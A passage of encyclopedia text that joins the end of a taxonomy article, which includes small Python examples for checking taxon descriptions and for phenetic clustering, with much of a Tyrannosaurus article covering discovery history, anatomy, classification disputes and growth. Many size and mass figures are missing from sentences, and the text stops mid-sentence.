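    type_specimens: list[str]      # name-bearing type specimen identifiers
    diagnosis: str                 # statements differentiating the taxon
    published_permanently: bool    # numerous identical, obtainable copies

    def problems(self) -> list[str]:
        issues = []
        if not set(self.name.lower().replace(" ", "")) <= LATIN_LETTERS:
            issues.append("name must use only the 26 letters of the Latin alphabet")
        if self.name in self.existing_names:
            issues.append("name is a homonym of an existing name")
        if not self.type_specimens:
            issues.append("at least one name-bearing type specimen is required")
        if not self.diagnosis.strip():
            issues.append("a description or diagnosis is required")
        if not self.published_permanently:
            issues.append("must be published as a permanent scientific record")
        return issues

# Example data (the diagnosis text here is a placeholder):
d = TaxonDescription("Tyrannosaurus rex", {"Dynamosaurus imperiosus"},
                     ["CM 9380"], "large theropod with ...", True)
print(d.problems() or "all five requirements met")
```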
Author citation

An "authority" may be placed after a scientific name. The authority is the name of the scientist or scientists who first validly published the name. For example, in 1758, Linnaeus gave the Asian elephant the scientific name Elephas maximus, so the name is sometimes written as "Elephas maximus Linnaeus, 1758". The names of authors are often abbreviated: the abbreviation L., for Linnaeus, is commonly used. In botany, there is, in fact, a regulated list of standard abbreviations (see list of botanists by author abbreviation). The system for assigning authorities differs slightly between botany and zoology. However, it is standard that if the genus of a species has been changed since the original description, the original authority's name is placed in parentheses.

Phenetics

In phenetics, also known as taximetrics or numerical taxonomy, organisms are classified based on overall similarity, regardless of their phylogeny or evolutionary relationships. It results in a measure of overall "distance" between taxa. Phenetic methods have become relatively rare in modern times, largely superseded by cladistic analyses, as phenetic methods do not distinguish shared ancestral (or plesiomorphic) traits from shared derived (or apomorphic) traits. However, certain phenetic methods, such as neighbor joining, have persisted as rapid estimators of relationships when more advanced methods (such as Bayesian inference) are too computationally expensive; a minimal sketch of one phenetic method appears at the end of this section.

Databases

Modern taxonomy uses database technologies to search and catalogue classifications and their documentation. While there is no commonly used database, there are comprehensive databases such as the Catalogue of Life, which attempts to list every documented species. The catalogue listed 1.64 million species for all kingdoms, claiming coverage of more than three-quarters of the estimated species known to modern science.
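As a concrete illustration of the phenetic approach described above, the following sketch clusters four invented taxa by overall distance using average linkage (UPGMA), a classic phenetic method (named here in place of neighbor joining for brevity). The distance values are invented, and the scipy library is assumed to be available.

```python
# A minimal sketch of phenetic grouping: overall-similarity clustering of
# taxa from a distance matrix with average linkage (UPGMA). Distances are
# invented for illustration.
from scipy.cluster.hierarchy import average, dendrogram
from scipy.spatial.distance import squareform
import numpy as np

taxa = ["taxon A", "taxon B", "taxon C", "taxon D"]   # hypothetical
# Symmetric matrix of pairwise phenetic distances (0 = identical):
D = np.array([
    [0.0, 0.2, 0.7, 0.8],
    [0.2, 0.0, 0.6, 0.9],
    [0.7, 0.6, 0.0, 0.3],
    [0.8, 0.9, 0.3, 0.0],
])

linkage = average(squareform(D))          # UPGMA on the condensed matrix
tree = dendrogram(linkage, labels=taxa, no_plot=True)
print("leaf order after clustering:", tree["ivl"])
```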
Biology and health sciences
Biology
null
30467
https://en.wikipedia.org/wiki/Tyrannosaurus
Tyrannosaurus
Tyrannosaurus is a genus of large theropod dinosaur. The type species Tyrannosaurus rex (rex meaning 'king' in Latin), often shortened to T. rex or colloquially T-Rex, is one of the best represented theropods. It lived throughout what is now western North America, on what was then an island continent known as Laramidia. Tyrannosaurus had a much wider range than other tyrannosaurids. Fossils are found in a variety of rock formations dating to the latest Campanian-Maastrichtian ages of the late Cretaceous period, 72.7 to 66 million years ago, with isolated specimens possibly indicating an earlier origin in the middle Campanian. It was the last known member of the tyrannosaurids and among the last non-avian dinosaurs to exist before the Cretaceous–Paleogene extinction event.

Like other tyrannosaurids, Tyrannosaurus was a bipedal carnivore with a massive skull balanced by a long, heavy tail. Relative to its large and powerful hind limbs, the forelimbs of Tyrannosaurus were short but unusually powerful for their size, and they had two clawed digits. The most complete specimen measures in length, but according to most modern estimates, Tyrannosaurus could have exceeded sizes of in length, in hip height, and in mass. Although some other theropods might have rivaled or exceeded Tyrannosaurus in size, it is still among the largest known land predators, with its estimated bite force being the largest among all terrestrial animals. By far the largest carnivore in its environment, Tyrannosaurus rex was most likely an apex predator, preying upon hadrosaurs, juvenile armored herbivores like ceratopsians and ankylosaurs, and possibly sauropods. Some experts have suggested the dinosaur was primarily a scavenger. The question of whether Tyrannosaurus was an apex predator or a pure scavenger was among the longest debates in paleontology. Most paleontologists today accept that Tyrannosaurus was both a predator and a scavenger.

Specimens of Tyrannosaurus rex include some that are nearly complete skeletons. Soft tissue and proteins have been reported in at least one of these specimens. The abundance of fossil material has allowed significant research into many aspects of its biology, including its life history and biomechanics. The feeding habits, physiology, and potential speed of Tyrannosaurus rex are a few subjects of debate. Its taxonomy is also controversial, as some scientists consider Tarbosaurus bataar from Asia to be a third Tyrannosaurus species, while others maintain Tarbosaurus is a separate genus. Several other genera of North American tyrannosaurids have also been synonymized with Tyrannosaurus. At present, two species of Tyrannosaurus are considered valid: the type species, T. rex, and the earlier in age and more recently discovered T. mcraeensis. As the archetypal theropod, Tyrannosaurus has been one of the best-known dinosaurs since the early 20th century and has been featured in film, advertising, postal stamps, and many other media.

History of research

Earliest finds

A tooth from what is now documented as a Tyrannosaurus rex was found in July 1874 on South Table Mountain near Golden, Colorado, by Peter T. Dotson, a student at Jarvis Hall, under the auspices of Prof. Arthur Lakes. In the early 1890s, John Bell Hatcher collected postcranial elements in eastern Wyoming. The fossils were believed to be from the large species Ornithomimus grandis (now Deinodon) but are now considered T. rex remains. In 1892, Edward Drinker Cope found two vertebral fragments of a large dinosaur.
Cope believed the fragments belonged to an "agathaumid" (ceratopsid) dinosaur, and named them Manospondylus gigas, meaning "giant porous vertebra", in reference to the numerous openings for blood vessels he found in the bone. The M. gigas remains were, in 1907, identified by Hatcher as those of a theropod rather than a ceratopsid. Henry Fairfield Osborn recognized the similarity between Manospondylus gigas and T. rex as early as 1917, by which time the second vertebra had been lost. Owing to the fragmentary nature of the Manospondylus vertebrae, Osborn did not synonymize the two genera, instead considering the older genus indeterminate. In June 2000, the Black Hills Institute found around 10% of a Tyrannosaurus skeleton (BHI 6248) at a site that might have been the original M. gigas locality.

Skeleton discovery and naming

Barnum Brown, assistant curator of the American Museum of Natural History, found the first partial skeleton of T. rex in eastern Wyoming in 1900. Brown found another partial skeleton in the Hell Creek Formation in Montana in 1902, comprising approximately 34 fossilized bones. Writing at the time, Brown said "Quarry No. 1 contains the femur, pubes, humerus, three vertebrae and two undetermined bones of a large Carnivorous Dinosaur not described by Marsh. ... I have never seen anything like it from the Cretaceous." Henry Fairfield Osborn, president of the American Museum of Natural History, named the second skeleton T. rex in 1905. The generic name is derived from the Greek words τύραννος (tyrannos, meaning "tyrant") and σαῦρος (sauros, meaning "lizard"). Osborn used the Latin word rex, meaning "king", for the specific name. The full binomial therefore translates to "tyrant lizard the king" or "King Tyrant Lizard", emphasizing the animal's size and presumed dominance over other species of the time. Osborn named the other specimen Dynamosaurus imperiosus in a paper in 1905. In 1906, Osborn recognized that the two skeletons were from the same species and selected Tyrannosaurus as the preferred name. In 1941, the T. rex type specimen was sold to the Carnegie Museum of Natural History in Pittsburgh, Pennsylvania, for $7,000. The original Dynamosaurus material now resides in the collections of the Natural History Museum, London. Dynamosaurus would later be honored by the 2018 description of another species of tyrannosaurid by Andrew McDonald and colleagues, Dynamoterror dynastes, whose name was chosen in reference to the 1905 name, as it had been a "childhood favorite" of McDonald's. From the 1910s through the end of the 1950s, Brown's discoveries remained the only specimens of Tyrannosaurus, as the Great Depression and wars kept many paleontologists out of the field.

Resurgent interest

Beginning in the 1960s, there was renewed interest in Tyrannosaurus, resulting in the recovery of 42 skeletons (5–80% complete by bone count) from Western North America. In 1967, Dr. William MacMannis located and recovered the skeleton named "MOR 008", which is 15% complete by bone count and has a reconstructed skull displayed at the Museum of the Rockies. The 1990s saw numerous discoveries, with nearly twice as many finds as in all previous years, including two of the most complete skeletons found to date: Sue and Stan. Sue Hendrickson, an amateur paleontologist, discovered the most complete (approximately 85%) and largest Tyrannosaurus skeleton in the Hell Creek Formation on August 12, 1990. The specimen Sue, named after the discoverer, was the object of a legal battle over its ownership.
In 1997, the litigation was settled in favor of Maurice Williams, the original land owner. The fossil collection was purchased by the Field Museum of Natural History at auction for $7.6 million, making it the most expensive dinosaur skeleton until the sale of Stan for $31.8 million in 2020. From 1998 to 1999, Field Museum of Natural History staff spent over 25,000 hours taking the rock off the bones. The bones were then shipped to New Jersey where the mount was constructed, then shipped back to Chicago for the final assembly. The mounted skeleton opened to the public on May 17, 2000, in the Field Museum of Natural History. A study of this specimen's fossilized bones showed that Sue reached full size at age 19 and died at the age of 28, the longest estimated life of any tyrannosaur known. Another Tyrannosaurus, nicknamed Stan (BHI 3033), in honor of amateur paleontologist Stan Sacrison, was recovered from the Hell Creek Formation in 1992. Stan is the second most complete skeleton found, with 199 bones recovered representing 70% of the total. This tyrannosaur also had many bone pathologies, including broken and healed ribs, a broken (and healed) neck, and a substantial hole in the back of its head, about the size of a Tyrannosaurus tooth. In 1998, 20-year-old Bucky Derflinger noticed a T. rex toe exposed above ground, making him the youngest person to discover a Tyrannosaurus. The specimen, dubbed Bucky in honor of its discoverer, was a young adult, tall and long. Bucky is the first Tyrannosaurus to be found that preserved a furcula (wishbone). Bucky is permanently displayed at The Children's Museum of Indianapolis. In the summer of 2000, crews organized by Jack Horner discovered five Tyrannosaurus skeletons near the Fort Peck Reservoir. In 2001, a 50% complete skeleton of a juvenile Tyrannosaurus was discovered in the Hell Creek Formation by a crew from the Burpee Museum of Natural History. Dubbed Jane (BMRP 2002.4.1), the find was thought to be the first known skeleton of a pygmy tyrannosaurid, Nanotyrannus, but subsequent research revealed that it is more likely a juvenile Tyrannosaurus, and the most complete juvenile example known; Jane is exhibited at the Burpee Museum of Natural History. In 2002, a skeleton nicknamed "Wyrex", discovered by amateur collectors Dan Wells and Don Wyrick, had 114 bones and was 38% complete. The dig was concluded over 3 weeks in 2004 by the Black Hills Institute with the first live online Tyrannosaurus excavation providing daily reports, photos, and video. In 2006, Montana State University revealed that it possessed the largest Tyrannosaurus skull yet discovered (from a specimen named MOR 008), measuring long. Subsequent comparisons indicated that the longest head was (from specimen LACM 23844) and the widest head was (from Sue). Footprints Two isolated fossilized footprints have been tentatively assigned to T. rex. The first was discovered at Philmont Scout Ranch, New Mexico, in 1983 by American geologist Charles Pillmore. Originally thought to belong to a hadrosaurid, examination of the footprint revealed a large 'heel' unknown in ornithopod dinosaur tracks, and traces of what may have been a hallux, the dewclaw-like fourth digit of the tyrannosaur foot. The footprint was published as the ichnogenus Tyrannosauripus pillmorei in 1994, by Martin Lockley and Adrian Hunt. Lockley and Hunt suggested that it was very likely the track was made by a T. rex, which would make it the first known footprint from this species. 
The track was made in what was once a vegetated wetland mudflat. It measures long by wide. A second footprint that may have been made by a Tyrannosaurus was first reported in 2007 by British paleontologist Phil Manning, from the Hell Creek Formation of Montana. This second track measures long, shorter than the track described by Lockley and Hunt. Whether or not the track was made by Tyrannosaurus is unclear, though Tyrannosaurus is the only large theropod known to have existed in the Hell Creek Formation. A set of footprints in Glenrock, Wyoming dating to the Maastrichtian stage of the Late Cretaceous and hailing from the Lance Formation were described by Scott Persons, Phil Currie and colleagues in 2016, and are believed to belong to either a juvenile T. rex or the dubious tyrannosaurid Nanotyrannus lancensis. From measurements and based on the positions of the footprints, the animal was believed to be traveling at a walking speed of around 2.8 to 5 miles per hour and was estimated to have a hip height of . A follow-up paper appeared in 2017, increasing the speed estimations by 50–80%. Description Size T. rex was one of the largest land carnivores of all time. One of its largest and the most complete specimens, nicknamed Sue (FMNH PR2081), is located at the Field Museum of Natural History in Chicago. Sue measured long, was tall at the hips, and according to the most recent studies, using a variety of techniques, maximum body masses have been estimated approximately . A specimen nicknamed Scotty (RSM P2523.8), located at the Royal Saskatchewan Museum, is reported to measure in length. Using a mass estimation technique that extrapolates from the circumference of the femur, Scotty was estimated as the largest known specimen at in body mass. Not every adult Tyrannosaurus specimen recovered is as big. Historically average adult mass estimates have varied widely over the years, from as low as , to more than , with most modern estimates ranging between . A 2024 study found that there was little evidence of size-based sexual dimorphism in T. rex. Skull The largest known T. rex skulls measure up to in length. Large fenestrae (openings) in the skull reduced weight, as in all carnivorous theropods. In other respects Tyrannosaurus's skull was significantly different from those of large non-tyrannosaurid theropods. It was extremely wide at the rear but had a narrow snout, allowing unusually good binocular vision. The skull bones were massive and the nasals and some other bones were fused, preventing movement between them; but many were pneumatized (contained a "honeycomb" of tiny air spaces) and thus lighter. These and other skull-strengthening features are part of the tyrannosaurid trend towards an increasingly powerful bite, which easily surpassed that of all non-tyrannosaurids. The tip of the upper jaw was U-shaped (most non-tyrannosauroid carnivores had V-shaped upper jaws), which increased the amount of tissue and bone a tyrannosaur could rip out with one bite, although it also increased the stresses on the front teeth. The teeth of T. rex displayed marked heterodonty (differences in shape). The premaxillary teeth, four per side at the front of the upper jaw, were closely packed, D-shaped in cross-section, had reinforcing ridges on the rear surface, were incisiform (their tips were chisel-like blades) and curved backwards. The D-shaped cross-section, reinforcing ridges and backwards curve reduced the risk that the teeth would snap when Tyrannosaurus bit and pulled. 
The remaining teeth were robust, like "lethal bananas" rather than daggers, more widely spaced and also had reinforcing ridges. Those in the upper jaw, twelve per side in mature individuals, were larger than their counterparts of the lower jaw, except at the rear. The largest found so far is estimated to have been long including the root when the animal was alive, making it the largest tooth of any carnivorous dinosaur yet found. The lower jaw was robust. Its front dentary bone bore thirteen teeth. Behind the tooth row, the lower jaw became notably taller. The upper and lower jaws of Tyrannosaurus, like those of many dinosaurs, possessed numerous foramina, or small holes in the bone. Various functions have been proposed for these foramina, such as a crocodile-like sensory system or evidence of extra-oral structures such as scales or potentially lips, with subsequent research on theropod tooth wear patterns supporting such a proposition. Skeleton The vertebral column of Tyrannosaurus consisted of ten neck vertebrae, thirteen back vertebrae and five sacral vertebrae. The number of tail vertebrae is unknown and could well have varied between individuals but probably numbered at least forty. Sue was mounted with forty-seven of such caudal vertebrae. The neck of T. rex formed a natural S-shaped curve like that of other theropods. Compared to these, it was exceptionally short, deep and muscular to support the massive head. The second vertebra, the axis, was especially short. The remaining neck vertebrae were weakly opisthocoelous, i.e. with a convex front of the vertebral body and a concave rear. The vertebral bodies had single pleurocoels, pneumatic depressions created by air sacs, on their sides. The vertebral bodies of the torso were robust but with a narrow waist. Their undersides were keeled. The front sides were concave with a deep vertical trough. They had large pleurocoels. Their neural spines had very rough front and rear sides for the attachment of strong tendons. The sacral vertebrae were fused to each other, both in their vertebral bodies and neural spines. They were pneumatized. They were connected to the pelvis by transverse processes and sacral ribs. The tail was heavy and moderately long, in order to balance the massive head and torso and to provide space for massive locomotor muscles that attached to the thighbones. The thirteenth tail vertebra formed the transition point between the deep tail base and the middle tail that was stiffened by a rather long front articulation processes. The underside of the trunk was covered by eighteen or nineteen pairs of segmented belly ribs. The shoulder girdle was longer than the entire forelimb. The shoulder blade had a narrow shaft but was exceptionally expanded at its upper end. It connected via a long forward protrusion to the coracoid, which was rounded. Both shoulder blades were connected by a small furcula. The paired breast bones possibly were made of cartilage only. The forelimb or arm was very short. The upper arm bone, the humerus, was short but robust. It had a narrow upper end with an exceptionally rounded head. The lower arm bones, the ulna and radius, were straight elements, much shorter than the humerus. The second metacarpal was longer and wider than the first, whereas normally in theropods the opposite is true. The forelimbs had only two clawed fingers, along with an additional splint-like small third metacarpal representing the remnant of a third digit. The pelvis was a large structure. 
Its upper bone, the ilium, was both very long and high, providing an extensive attachment area for hindlimb muscles. The front pubic bone ended in an enormous pubic boot, longer than the entire shaft of the element. The rear ischium was slender and straight, pointing obliquely to behind and below. In contrast to the arms, the hindlimbs were among the longest in proportion to body size of any theropod. In the foot, the metatarsus was "arctometatarsalian", meaning that the part of the third metatarsal near the ankle was pinched. The third metatarsal was also exceptionally sinuous. Compensating for the immense bulk of the animal, many bones throughout the skeleton were hollowed, reducing its weight without significant loss of strength. Classification Tyrannosaurus is the type genus of the superfamily Tyrannosauroidea, the family Tyrannosauridae, and the subfamily Tyrannosaurinae; in other words it is the standard by which paleontologists decide whether to include other species in the same group. Other members of the tyrannosaurine subfamily include the North American Daspletosaurus and the Asian Tarbosaurus, both of which have occasionally been synonymized with Tyrannosaurus. Tyrannosaurids were once commonly thought to be descendants of earlier large theropods such as megalosaurs and carnosaurs, although more recently they were reclassified with the generally smaller coelurosaurs. The earliest tyrannosaur group were the crested proceratosaurids, while later and more derived members belong to the Pantyrannosauria. Tyrannosaurs started out as small theropods; however at least some became larger by the Early Cretaceous. Tyrannosauroids are characterized by their fused nasals and dental arrangement. Pantyrannosaurs are characterized by unique features in their hips as well as an enlarged foramen in the quadrate, a broad postorbital and hourglass shaped nasals. Some of the more derived pantyrannosaurs lack nasal pneumaticity and have a lower humerus to femur ratio with their arms starting to see some reduction. Some pantyrannosaurs started developing an arctometatarsus. Eutyrannosaurs have a rough texture on their nasal bones and their mandibular fenestra is reduced externally. Tyrannosaurids lack kinetic skulls or special crests on their nasal bones, and have a lacrimal with a distinctive process on it. Tyrannosaurids also have an interfenestral strut that is less than half as big as the maxillary fenestra. It is quite likely that tyrannosauroids rose to prominence after the decline in allosauroid and megalosauroid diversity seen during the early stages of the Late Cretaceous. Below is a simple cladogram of general tyrannosauroid relationships that was found after an analysis conducted by Li and colleagues in 2009. Many phylogenetic analyses have found Tarbosaurus bataar to be the sister taxon of T. rex. The discovery of the tyrannosaurid Lythronax further indicates that Tarbosaurus and Tyrannosaurus are closely related, forming a clade with fellow Asian tyrannosaurid Zhuchengtyrannus, with Lythronax being their sister taxon. A further study from 2016 by Steve Brusatte, Thomas Carr and colleagues, also indicates that Tyrannosaurus may have been an immigrant from Asia, as well as a possible descendant of Tarbosaurus. Below is the cladogram of Tyrannosauridae based on the phylogenetic analysis conducted by Loewen and colleagues in 2013. In their 2024 description of Tyrannosaurus mcraeensis, Dalman et al. 
recovered similar results to previous analyses, with Tyrannosaurus as the sister taxon to the clade formed by Tarbosaurus and Zhuchengtyrannus, called the Tyrannosaurini. They also found support for a monophyletic clade containing Daspletosaurus and Thanatotheristes, typically referred to as the Daspletosaurini. Additional species In 1955, Soviet paleontologist Evgeny Maleev named a new species, Tyrannosaurus bataar, from Mongolia. By 1965, this species was renamed as a distinct genus, Tarbosaurus bataar. While most palaeontologists continue to maintain the two as distinct genera, some authors such as Thomas Holtz, Kenneth Carpenter, and Thomas Carr argue that the two species are similar enough to be considered members of the same genus, restoring the Mongolian taxon's original binomial name. Some specimens from the Late Cretaceous deposits of China have been described as new species of Tyrannosaurus: T. lanpingensis based on isolated lateral tooth from the red beds of Yunnan in 1975; T. turpanensis from the Subashi Formation, Turpan Basin, Xinjiang in 1978; and T. luanchuanensis from the Quiba Formation, Tantou Basin, Henan Province in 1979–1980. All these taxa were published without detailed descriptions and were later accepted as junior synonyms of Tarbosaurus bataar by Holtz in 2004. VGI, no. 231/3, a large phalanx bone, assigned to Tyrannosaurus sp. by Yarkov in 2000, was found in the Lower Maastrichtian of Bereslavka, Russia. In 2004, Averianov and Yarkov reinterpreted it as a metacarpal I or metatarsal I that possibly belongs to ceratosaur. In their 2023 overview, Averianov and Lopatin mention this specimen as well as a single tooth from the same site only as Theropoda indet. In 2001, various tyrannosaurid teeth and a metatarsal unearthed in a quarry near Zhucheng, China were assigned by Chinese paleontologist Hu Chengzhi to the newly erected species Tyrannosaurus zhuchengensis. However, in a nearby site, a right maxilla and left jawbone were assigned to the newly erected tyrannosaurid genus Zhuchengtyrannus in 2011. It is possible that T. zhuchengensis is synonymous with Zhuchengtyrannus. In any case, T. zhuchengensis is considered to be a nomen dubium as the holotype lacks diagnostic features below the level Tyrannosaurinae. In 2006, a fragmentary tyrannosaurid lacrimal (CM 9401) from the Judith River Formation of Fergus County, Montana was described as ?Tyrannosaurus sp. This isolated right lacrimal was originally collected alongside the holotype specimen of Deinosuchus rugosus, a giant crocodylian, and remained undescribed until its re-identification as belonging to a tyrannosaurid theropod in the 1980s by paleontologist Dale Russell. The lacrimal closely resembles those of Tyrannosaurus rex in both size and morphology. Notably, it lacks the "lacrimal horn" typically present in earlier tyrannosaurids like Albertosaurus and Gorgosaurus, instead exhibiting a distinct rugosity along the dorsal surface—consistent with T. rex and its Asian relative Tarbosaurus. The specimen's considerable size places it within the range of known T. rex individuals, suggesting the presence of large tyrannosaurids during the Campanian stage (~75 million years ago), a temporal range earlier than the established Maastrichtian age (~68–66 Ma) for Tyrannosaurus rex. However, the exact age and provenance of CM 9401 remain uncertain due to a lack of detailed field documentation. 
In 2018, a paper describing tyrannosaurid teeth from the Two Medicine Formation noted a premaxillary tooth (YPM VPPU 023469) had a strong resemblance to the teeth of Sue to the exclusion of any Campanian tyrannosaurid. Additionally, the authors of this paper suggested that CM 9401 also comes from the Two Medicine Formation, as there were preservational similarities between its locality and the Willow Creek anticline, which is where the tooth was found. Notably, this would place both specimens in the Flag Butte Member of the Two Medicine Formation, which dates from 77 to 76.3 Ma, far younger than any other Tyrannosaurus specimen, and directly contemporaneous with Daspletosaurus. In 2025, these specimens, with their old geologic age, were used as evidence by Charlie Scherer to suggest that the Tyrannosaurini did not evolve directly from Daspletosaurus. In a 2022 study, Gregory S. Paul and colleagues argued that Tyrannosaurus rex, as traditionally understood, actually represents three species: the type species Tyrannosaurus rex, and two new species: T. imperator (meaning "tyrant lizard emperor") and T. regina (meaning "tyrant lizard queen"). The holotype of the former (T. imperator) is the Sue specimen, and the holotype of the latter (T. regina) is Wankel rex. The division into multiple species was primarily based on the observation of a very high degree of variation in the proportions and robusticity of the femur (and other skeletal elements) across catalogued T. rex specimens, more so than that observed in other theropods recognized as one species. Differences of general body proportions representing robust and gracile morphotypes were also used as a line of evidence, in addition to the number of small, slender incisiform teeth in the dentary, as based on tooth sockets. Specifically, the paper's T. rex was distinguished by robust anatomy, a moderate ratio of femur length vs circumference, and the possession of a singular slender incisiform dentary tooth; T. imperator was considered to be robust with a small femur length to circumference ratio and two of the slender teeth; and T. regina was a gracile form with a high femur ratio and one of the slender teeth. It was observed that variation in proportions and robustness became more extreme higher up in the sample, stratigraphically. This was interpreted as a single earlier population, T. imperator, speciating into more than one taxon, T. rex and T. regina. However, several other leading paleontologists, including Stephen Brusatte, Thomas Carr, Thomas Holtz, David Hone, Jingmai O'Connor, and Lindsay Zanno, criticized the study or expressed skepticism of its conclusions when approached by various media outlets for comment. Their criticism was subsequently published in a technical paper. Holtz and Zanno both remarked that it was plausible that more than one species of Tyrannosaurus existed, but felt the new study was insufficient to support the species it proposed. Holtz remarked that, even if Tyrannosaurus imperator represented a distinct species from Tyrannosaurus rex, it may represent the same species as Nanotyrannus lancensis and would need to be called Tyrannosaurus lancensis. O'Connor, a curator at the Field Museum, where the T. imperator holotype Sue is displayed, regarded the new species as too poorly-supported to justify modifying the exhibit signs. Brusatte, Carr, and O'Connor viewed the distinguishing features proposed between the species as reflecting natural variation within a species. 
Both Carr and O'Connor expressed concerns about the study's inability to determine which of the proposed species several well-preserved specimens belonged to. Another paleontologist, Philip J. Currie, originally co-authored the study but withdrew from it as he did not want to be involved in naming the new species. Paul still rejected the objections raised by critics, insisting that they are unwilling to consider that Tyrannosaurus might represent more than one species. Tyrannosaurus mcraeensis In 2024, Dalman and colleagues described the remains of a tyrannosaur discovered in 1983 in the Campanian-early Maastrichtian Hall Lake Formation in New Mexico. Reposited at the New Mexico Museum of Natural History and Science, the fossil material (NMMNH P-3698) consists of the right postorbital, right squamosal, left palatine, and an incomplete maxilla from the skull, the left dentary, right splenial, right prearticular, right angular and right articular from the lower jaws, isolated teeth, and chevrons. Some of the bones were briefly mentioned in 1984 as belonging to T. rex, and described in 1986. Lehman and Carpenter (1990) suggested that NMMNH P-3698 belonged to a new tyrannosaurid genus, while Carr and Williamson (2000) disagreed with their claim. Sullivan and Lucas (2015) argued that there is little evidence to support NMMNH P-3698 as a specimen of Tyrannosaurus rex, so they tentatively classified it as cf. Tyrannosaurus sp.; they also considered that the McRae tyrannosaur lived before the Lancian (before 67 million years ago) based on its coexistence with Alamosaurus. Dalman et al. (2024) proposed the new name Tyrannosaurus mcraeensis for the holotype (NMMNH P-3698), referencing the McRae Group, the rock layers to which the Hall Lake Formation belongs. These rock layers were estimated to date to between 72.7 and 70.9 Ma, correlating to the latest Campanian or earliest Maastrichtian. U-Pb zircon age estimates by Schantz and Amato (2024) also support the late Campanian to early Maastrichtian age of the Hall Lake Formation, with the mean estimate of 74.1 ± 0.9 Ma at above the base of the formation and the maximum depositional age of 69.8 ± 0.7 Ma based on a sandstone from this fossil locality. The holotype of T. mcraeensis is found in the strata that are around a few million years older than the accepted range of T. rex, which existed at the end of the Maastrichtian. T. mcraeensis was estimated at long, which is similar to the size of an adult T. rex. The two are distinguished by characters of the skull. Amongst these, the dentary of T. mcraeensis is proportionately longer and possesses a less prominent chin, and the lower jaw shallower than that of T. rex, suggesting a weaker bite. The teeth are likewise blunter and more laterally compressed, while the post orbital crests are less prominent. Likewise, the skeletal anatomy showcases shared characteristics with Tarbosaurus and Zhuchengtyrannus. Nanotyrannus Other tyrannosaurid fossils found in the same formations as T. rex were originally classified as separate taxa, including Aublysodon and Albertosaurus megagracilis, the latter being named Dinotyrannus megagracilis in 1995. These fossils are now universally considered to belong to juvenile T. rex. A small but nearly complete skull from Montana, long, might be an exception. This skull, CMNH 7541, was originally classified as a species of Gorgosaurus (G. lancensis) by Charles W. Gilmore in 1946. In 1988, the specimen was re-described by Robert T. 
Bakker, Phil Currie, and Michael Williams, then the curator of paleontology at the Cleveland Museum of Natural History, where the original specimen was housed and is now on display. Their initial research indicated that the skull bones were fused, and that it therefore represented an adult specimen. In light of this, Bakker and colleagues assigned the skull to a new genus named Nanotyrannus (meaning "dwarf tyrant", for its apparently small adult size). The specimen is estimated to have been around long when it died. However, in 1999, a detailed analysis by Thomas Carr revealed the specimen to be a juvenile, leading Carr and many other paleontologists to consider it a juvenile T. rex individual. In 2001, a more complete juvenile tyrannosaur (nicknamed "Jane", catalog number BMRP 2002.4.1), belonging to the same species as the original Nanotyrannus specimen, was uncovered. This discovery prompted a conference on tyrannosaurs, focused on the issue of Nanotyrannus's validity, at the Burpee Museum of Natural History in 2005. Several paleontologists who had previously published opinions that N. lancensis was a valid species, including Currie and Williams, saw the discovery of "Jane" as confirmation that Nanotyrannus was, in fact, a juvenile T. rex. Peter Larson continued to support the hypothesis that N. lancensis was a separate but closely related species, based on skull features such as the presence of two more teeth in each jaw than in T. rex, as well as proportionately larger hands with phalanges on the third metacarpal, and differing wishbone anatomy in an undescribed specimen. He also argued that Stygivenator, generally considered to be a juvenile T. rex, may be a younger Nanotyrannus specimen. Later research revealed that other tyrannosaurids, such as Gorgosaurus, also experienced a reduction in tooth count during growth; given the disparity in tooth count between individuals of the same age group in that genus and in Tyrannosaurus, this feature may also be due to individual variation. In 2013, Carr noted that all of the differences claimed to support Nanotyrannus had turned out to be individually or ontogenetically variable features, or products of distortion of the bones. In 2016, an analysis of limb proportions by Persons and Currie suggested that Nanotyrannus specimens had differing levels of cursoriality, potentially separating the taxon from T. rex. However, paleontologist Manabu Sakamoto has commented that this conclusion may be affected by the low sample size, and that the discrepancy does not necessarily reflect taxonomic distinction. In 2016, Joshua Schmerge argued for Nanotyrannus's validity based on skull features, including a dentary groove in BMRP 2002.4.1's skull. According to Schmerge, as that feature is absent in T. rex and found only in Dryptosaurus and albertosaurines, this suggests that Nanotyrannus is a distinct taxon within the Albertosaurinae. The same year, Carr and colleagues noted that this was insufficient to clarify Nanotyrannus's validity or classification, as it is a common and ontogenetically variable feature among tyrannosauroids. A 2020 study by Holly Woodward and colleagues showed that the specimens referred to Nanotyrannus were all ontogenetically immature, and found it probable that these specimens belonged to T. rex. The same year, Carr published a paper on T. rex's growth history, finding that CMNH 7541 fit within the expected ontogenetic variation of the taxon and displayed juvenile characteristics found in other specimens. It was classified as a juvenile, under 13 years old, with a skull less than .
No significant sexual or phylogenetic variation was discernible among any of the 44 specimens studied, with Carr stating that characters of potential phylogenetic importance varied with age at the same rate as growth occurred. Discussing the paper's results, Carr described how all Nanotyrannus specimens formed a continuous growth transition between the smallest juveniles and the subadults, unlike what would be expected if it were a distinct taxon, in which case the specimens would group to the exclusion of Tyrannosaurus. Carr concluded that "the 'nanomorphs' are not all that similar to each other and instead form an important bridge in the growth series of T. rex that captures the beginnings of the profound change from the shallow skull of juveniles to the deep skull that is seen in fully-developed adults." However, a 2024 paper by Nick Longrich and Evan Thomas Saitta reexamined the holotype and referred specimens of Nanotyrannus. Based on several factors, including differences in morphology, ontogeny, and phylogeny, Longrich and Saitta suggested that Nanotyrannus is a distinct taxon, one which may fall outside of Tyrannosauridae based on some of their phylogenetic analyses.

Paleobiology

Life history

The identification of several specimens as juvenile T. rex has allowed scientists to document ontogenetic changes in the species, estimate its lifespan, and determine how quickly the animals would have grown. The smallest known individual (LACM 28471, the "Jordan theropod") is estimated to have weighed only , while the largest adults, such as FMNH PR2081 (Sue), most likely weighed about . Histologic analysis of T. rex bones showed that LACM 28471 was only two years old when it died, while Sue was 28 years old, an age which may have been close to the maximum for the species. Histology has also allowed the age of other specimens to be determined. Growth curves can be developed when the ages of different specimens are plotted on a graph along with their mass. A T. rex growth curve is S-shaped, with juveniles remaining under until approximately 14 years of age, when body size began to increase dramatically. During this rapid growth phase, a young T. rex would gain an average of a year for the next four years. At 18 years of age, the curve plateaus again, indicating that growth slowed dramatically. For example, only separated the 28-year-old Sue from a 22-year-old Canadian specimen (RTMP 81.12.1). A 2004 histological study performed by different workers corroborates these results, finding that rapid growth began to slow at around 16 years of age. A study by Hutchinson and colleagues in 2011 corroborated the previous estimation methods in general, but its estimate of peak growth rate is significantly higher; it found that the "maximum growth rates for T. rex during the exponential stage are 1790 kg/year". Although these results were much higher than previous estimations, the authors noted that they 